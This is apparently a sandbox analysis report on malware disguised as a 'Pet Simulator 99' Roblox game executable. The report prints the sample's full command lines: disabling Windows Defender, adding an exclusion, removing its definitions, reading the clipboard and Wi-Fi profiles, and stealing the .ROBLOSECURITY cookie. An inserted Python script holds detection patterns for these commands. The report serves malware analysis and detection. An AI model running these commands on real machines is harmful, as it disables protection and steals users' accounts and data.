Resubmissions

10/05/2024, 16:18

240510-tr6vcshf36 8

10/05/2024, 15:44

240510-s6vj7sdc4x 8

Analysis

  • max time kernel
    250s
  • max time network
    251s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240508-en
  • resource tags

    arch:x64
    arch:x86
    image:win11-20240508-en
    locale:en-us
    os:windows11-21h2-x64
    system
  • submitted
    10/05/2024, 16:18

General

  • Target

    [🚪BACKROOMS] Pet Simulator 99!.exe

  • Size

    8.5MB

  • MD5

    049690a7ad5481a5615d3943700795cb

  • SHA1

    185cb4020b9eda09d2ac9b4caa7f6493f7072b80

  • SHA256

    b984e378befd8a00559bb9f7d58015ea781615f47172a1c0ccfd4fad3cb2b9a2

  • SHA512

    465027b5bf59517f0a696fcddd5b6dea59e49e5de8d784f135d1f8134f0550ea39813b94e88637481683822db37b3f965e55fddecb6b432ba1afff7f48fa947f

  • SSDEEP

    196608:6hZyegQA1HeT39IigwdeE9TFa0Z8DOjCdylLhYMfXfQSZ//OoZ:agp1+TtIiFUY9Z8D8CcldlvoMjZ

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

  • Loads dropped DLL 17 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials, cookies and session tokens.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Enumerates processes with tasklist 1 TTPs 3 IoCs
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Modifies data under HKEY_USERS 2 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 22 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 26 IoCs
  • Suspicious use of SendNotifyMessage 12 IoCs
  • Suspicious use of SetWindowsHookEx 9 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\[🚪BACKROOMS] Pet Simulator 99!.exe
    "C:\Users\Admin\AppData\Local\Temp\[🚪BACKROOMS] Pet Simulator 99!.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2600
    • C:\Users\Admin\AppData\Local\Temp\[🚪BACKROOMS] Pet Simulator 99!.exe
      "C:\Users\Admin\AppData\Local\Temp\[🚪BACKROOMS] Pet Simulator 99!.exe"
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:4116
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\[🚪BACKROOMS] Pet Simulator 99!.exe'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3708
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\[🚪BACKROOMS] Pet Simulator 99!.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1488
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3452
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4704
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2456
        • C:\Windows\system32\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:4948
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3816
        • C:\Windows\system32\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:2952
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1924
        • C:\Windows\System32\Wbem\WMIC.exe
          WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:2756
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1556
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Get-Clipboard
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2620
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1564
        • C:\Windows\system32\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:1192
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1056
        • C:\Windows\system32\tree.com
          tree /A /F
          4⤵
            PID:3164
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4004
        • C:\Windows\system32\netsh.exe
          netsh wlan show profile
          4⤵
          PID:2240
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "systeminfo"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3632
        • C:\Windows\system32\systeminfo.exe
          systeminfo
          4⤵
          • Gathers system information
          PID:3544
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:5112
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2748
          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
            "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\wk133bt4\wk133bt4.cmdline"
            5⤵
            PID:2312
            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
              C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8916.tmp" "c:\Users\Admin\AppData\Local\Temp\wk133bt4\CSCFF828B6DEEF482799C0DE4D8EFA6D40.TMP"
              6⤵
              PID:1972
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3720
        • C:\Windows\system32\tree.com
          tree /A /F
          4⤵
          PID:412
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3280
        • C:\Windows\system32\tree.com
          tree /A /F
          4⤵
          PID:3756
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2560
        • C:\Windows\system32\tree.com
          tree /A /F
          4⤵
          PID:3360
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1908
        • C:\Windows\system32\tree.com
          tree /A /F
          4⤵
          PID:3056
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        3⤵
        PID:3844
        • C:\Windows\system32\tree.com
          tree /A /F
          4⤵
          PID:3516
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
        3⤵
        PID:2316
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3908
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
        3⤵
        PID:636
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3896
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "getmac"
        3⤵
        PID:4536
        • C:\Windows\system32\getmac.exe
          getmac
          4⤵
          PID:4132
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "wmic os get Caption"
        3⤵
        PID:5112
        • C:\Windows\System32\Wbem\WMIC.exe
          wmic os get Caption
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:3664
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
        3⤵
        PID:2136
        • C:\Windows\System32\Wbem\WMIC.exe
          wmic computersystem get totalphysicalmemory
          4⤵
          PID:1528
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        3⤵
        PID:4552
        • C:\Windows\System32\Wbem\WMIC.exe
          wmic csproduct get uuid
          4⤵
          PID:3944
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
        3⤵
        PID:5048
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:768
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
        3⤵
        PID:4884
        • C:\Windows\System32\Wbem\WMIC.exe
          wmic path win32_VideoController get name
          4⤵
          • Detects videocard installed
          PID:4492
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
        3⤵
        PID:3412
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:2584
  • C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe"
    1⤵
    • Enumerates system info in registry
    • Modifies data under HKEY_USERS
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    PID:4920
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x10c,0x110,0x114,0xe8,0x118,0x7ffb3491ab58,0x7ffb3491ab68,0x7ffb3491ab78
      2⤵
      PID:4072
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1660 --field-trial-handle=1772,i,10791939981844242571,9520471113663904357,131072 /prefetch:2
      2⤵
      PID:792
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2120 --field-trial-handle=1772,i,10791939981844242571,9520471113663904357,131072 /prefetch:8
      2⤵
      PID:768
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2184 --field-trial-handle=1772,i,10791939981844242571,9520471113663904357,131072 /prefetch:8
      2⤵
      PID:4600
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3088 --field-trial-handle=1772,i,10791939981844242571,9520471113663904357,131072 /prefetch:1
      2⤵
      PID:3748
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3164 --field-trial-handle=1772,i,10791939981844242571,9520471113663904357,131072 /prefetch:1
      2⤵
      PID:4884
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4244 --field-trial-handle=1772,i,10791939981844242571,9520471113663904357,131072 /prefetch:1
      2⤵
      PID:4312
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4344 --field-trial-handle=1772,i,10791939981844242571,9520471113663904357,131072 /prefetch:8
      2⤵
      PID:4836
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4516 --field-trial-handle=1772,i,10791939981844242571,9520471113663904357,131072 /prefetch:8
      2⤵
      PID:2064
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4672 --field-trial-handle=1772,i,10791939981844242571,9520471113663904357,131072 /prefetch:8
      2⤵
      PID:2400
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4428 --field-trial-handle=1772,i,10791939981844242571,9520471113663904357,131072 /prefetch:8
      2⤵
      PID:3044
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4732 --field-trial-handle=1772,i,10791939981844242571,9520471113663904357,131072 /prefetch:8
      2⤵
      PID:2284
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=4460 --field-trial-handle=1772,i,10791939981844242571,9520471113663904357,131072 /prefetch:1
      2⤵
      PID:4272
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=3356 --field-trial-handle=1772,i,10791939981844242571,9520471113663904357,131072 /prefetch:1
      2⤵
      PID:3084
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4956 --field-trial-handle=1772,i,10791939981844242571,9520471113663904357,131072 /prefetch:8
      2⤵
      • Modifies registry class
      • Suspicious behavior: GetForegroundWindowSpam
      • Suspicious use of SetWindowsHookEx
      PID:1084
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2808 --field-trial-handle=1772,i,10791939981844242571,9520471113663904357,131072 /prefetch:2
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      PID:2948
  • C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
    "C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
    1⤵
    PID:856

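A triage script for the process tree above, added here as an example; it is not part of the tria.ge report and not code from the sample. It groups child command lines by parent PID, matches each against patterns for the behaviours the tree shows (the Add-MpPreference exclusion, the Set-MpPreference tampering and MpCmdRun -RemoveDefinitions, the SecurityCenter2 AV query, tasklist/systeminfo/wmic/getmac, netsh wlan profiles, Get-Clipboard, the .ROBLOSECURITY registry read) and flags a parent whose children combine defence evasion with broad discovery. The event tuples are constructed from the command lines and PIDs shown in the tree; the (pid, ppid, cmdline) shape, the rule names and the ATT&CK technique mappings are this example's assumptions, not fields of the report.

```python
"""Score one parent's child command lines for the stealer pattern seen in the
process tree: Defender tampering followed by discovery and credential reads.
Added example for this report; not tria.ge code and not the sample's code."""
import re
from collections import defaultdict

# (rule name, ATT&CK technique, regex over the command line).
# Technique mappings are this example's assumption, not the report's.
RULES = [
    ("defender_exclusion",   "T1562.001", r"Add-MpPreference\s+-ExclusionPath"),
    ("defender_disable",     "T1562.001",
     r"Set-MpPreference\b.*-Disable(RealtimeMonitoring|IOAVProtection|ScriptScanning|IntrusionPreventionSystem)\s+\$true"),
    ("defender_remove_defs", "T1562.001", r"MpCmdRun(\.exe)?\"?\s+-RemoveDefinitions"),
    ("av_discovery",         "T1518.001", r"SecurityCenter2\b.*\bAntivirusProduct\b"),
    ("process_discovery",    "T1057",     r"\btasklist\b"),
    ("system_discovery",     "T1082",
     r"\b(systeminfo|getmac|wmic\s+(os|csproduct|computersystem|path\s+win32_VideoController)\b)"),
    ("wifi_profiles",        "T1016.002", r"netsh\s+wlan\s+show\s+profile"),
    ("clipboard_read",       "T1115",     r"\bGet-Clipboard\b"),
    ("roblox_cookie_read",   "T1552.002", r"RobloxStudioBrowser\\roblox\.com\b.*\.ROBLOSECURITY"),
    ("encoded_powershell",   "T1059.001", r"powershell(\.exe)?\b.*-EncodedCommand"),
]
COMPILED = [(name, tech, re.compile(pat, re.IGNORECASE)) for name, tech, pat in RULES]

# Constructed from the process tree as (pid, ppid, command line).
# 4116 is the second-stage copy of the sample; 4920 is chrome.exe (benign control).
EVENTS = [
    (3708, 4116, r'''C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\[🚪BACKROOMS] Pet Simulator 99!.exe'"'''),
    (3452, 4116, r'''C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"'''),
    (2456, 4116, r'''C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"'''),
    (1924, 4116, r'''C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"'''),
    (1556, 4116, r'''C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"'''),
    (4004, 4116, r'''C:\Windows\system32\cmd.exe /c "netsh wlan show profile"'''),
    (3632, 4116, r'''C:\Windows\system32\cmd.exe /c "systeminfo"'''),
    (2316, 4116, r'''C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"'''),
    (4536, 4116, r'''C:\Windows\system32\cmd.exe /c "getmac"'''),
    (4884, 4116, r'''C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"'''),
    (4072, 4920, r'''"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler'''),
]


def classify(cmdline):
    """Return the (rule, technique) pairs whose pattern matches one command line."""
    return [(name, tech) for name, tech, rx in COMPILED if rx.search(cmdline)]


def triage(events):
    """Group hits by parent PID and give each parent a verdict.

    A parent is 'stealer-like' when its children show Defender tampering
    (T1562.001) plus at least three other distinct techniques; parents whose
    children trigger no rule at all are left out of the result."""
    per_parent = defaultdict(lambda: {"hits": [], "techniques": set()})
    for pid, ppid, cmdline in events:
        for name, tech in classify(cmdline):
            per_parent[ppid]["hits"].append((pid, name, tech))
            per_parent[ppid]["techniques"].add(tech)
    for rec in per_parent.values():
        tampered = "T1562.001" in rec["techniques"]
        others = len(rec["techniques"] - {"T1562.001"})
        if tampered and others >= 3:
            rec["verdict"] = "stealer-like: defence evasion plus broad discovery"
        elif tampered:
            rec["verdict"] = "defender tampering"
        else:
            rec["verdict"] = "discovery only"
    return dict(per_parent)


if __name__ == "__main__":
    for ppid, rec in triage(EVENTS).items():
        print(f"parent {ppid}: {rec['verdict']}")
        for pid, name, tech in rec["hits"]:
            print(f"  {pid:>5}  {tech:<10} {name}")
```

Run against the constructed events, parent 4116 collects eleven hits across seven techniques and is flagged stealer-like, while the chrome.exe parent produces no hits and is absent from the result. Note that the Set-MpPreference line alone yields two T1562.001 hits (the -Disable* switches and the MpCmdRun -RemoveDefinitions tail), which is why the verdict counts distinct techniques rather than raw hits.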
Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\57871764-d455-4ddd-81c7-365ac9220fa3.tmp

    Filesize

    6KB

    MD5

    db70e63fb40d0c1673e51814db052acc

    SHA1

    72bcd059eb99d9fb97324576b492fda8bd478a11

    SHA256

    15dcdd7f46697c0ea5092d5dc0a103854c48606212a851e1ced1971d578bd00c

    SHA512

    9f2be5dcae83700dd1865141643dcf168b1f55fbefe248703fa24dc87ed725f2ffcd0a7241d18cf5b6cc55193b25e393899c7b81ee4d4e3c08d4b92ea7fc95c1

  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000023

    Filesize

    24KB

    MD5

    f782de7f00a1e90076b6b77a05fa908a

    SHA1

    4ed15dad2baa61e9627bf2179aa7b9188ce7d4e1

    SHA256

    d0b96d69ee7f70f041f493592de3805bfb338e50babdee522fcf145cb98fc968

    SHA512

    78ec6f253e876d8f0812a9570f6079903d63dd000458f4f517ec44c8dd7468e51703ea17ecce2658d9ea1fdb5246c8db5887a16be80115bbf71fe53f439d8766

  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000024

    Filesize

    199KB

    MD5

    585ac11a4e8628c13c32de68f89f98d6

    SHA1

    bcea01f9deb8d6711088cb5c344ebd57997839db

    SHA256

    d692f27c385520c3b4078c35d78cdf154c424d09421dece6de73708659c7e2a6

    SHA512

    76d2ed3f41df567fe4d04060d9871684244764fc59b81cd574a521bb013a6d61955a6aedf390a1701e3bfc24f82d92fd062ca9e461086f762a3087c142211c19

  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\temp-index

    Filesize

    1KB

    MD5

    5a192948842d852e1a77633cb26d3d9d

    SHA1

    9324aada14b9d81ce9bccfa138ffe2f9f229f934

                                                                              SHA256

                                                                              ad97f8e2f898f9294ae8b03d3a0d5f388c5e46cd55cd2572d93024c65adc9133

                                                                              SHA512

                                                                              75de8525cdd1ea463c118547d6d6fb8bd328eb1643784cf6825bfc363f0433c147f6a77c2fbca810c2591964554aaa27b46de9caa1109f6110fed9e9f5c4d938

                                                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

                                                                              Filesize

                                                                              984B

                                                                              MD5

                                                                              6ff4ddeb0cfe9bc4903a797b9edea4b4

                                                                              SHA1

                                                                              1aabfb7b003ac918e29cf76358679bf1ad415da2

                                                                              SHA256

                                                                              6139f36b178aba5806bbcccc11f37f9c47ce6f63897478121bfacc43c250ab0e

                                                                              SHA512

                                                                              b3b2bba66bcef27e1bf3f0bea6bc14c0c4126c8e05ff8dab3aefdce7c08e6fc7dfc3c2ac71781d2d8e852733cd40c398611f6a5af0c3b3f739d18f7cf86e1d4f

                                                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

                                                                              Filesize

                                                                              1KB

                                                                              MD5

                                                                              43c829d9a690226590dc49cd585bd401

                                                                              SHA1

                                                                              6e7466685b77f5c5aa08c14c516b140a881c1e6e

                                                                              SHA256

                                                                              29765ec1ed0e5711feec81c70dd4a8d4d1efbc1beb72df2984c3734d2550e4ac

                                                                              SHA512

                                                                              ae6dd38e58f463d9df17fee4981f1444921be1010fce0176c2681ef24ca83b6813ce5742ce7db5ffaad13c9c8a5504c9ab312138728c17fd608c1411bfdf2efb

                                                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\1107aee8-daad-4ccf-b58b-ed67a490c852.tmp

                                                                              Filesize

                                                                              2B

                                                                              MD5

                                                                              d751713988987e9331980363e24189ce

                                                                              SHA1

                                                                              97d170e1550eee4afc0af065b78cda302a97674c

                                                                              SHA256

                                                                              4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

                                                                              SHA512

                                                                              b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

                                                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

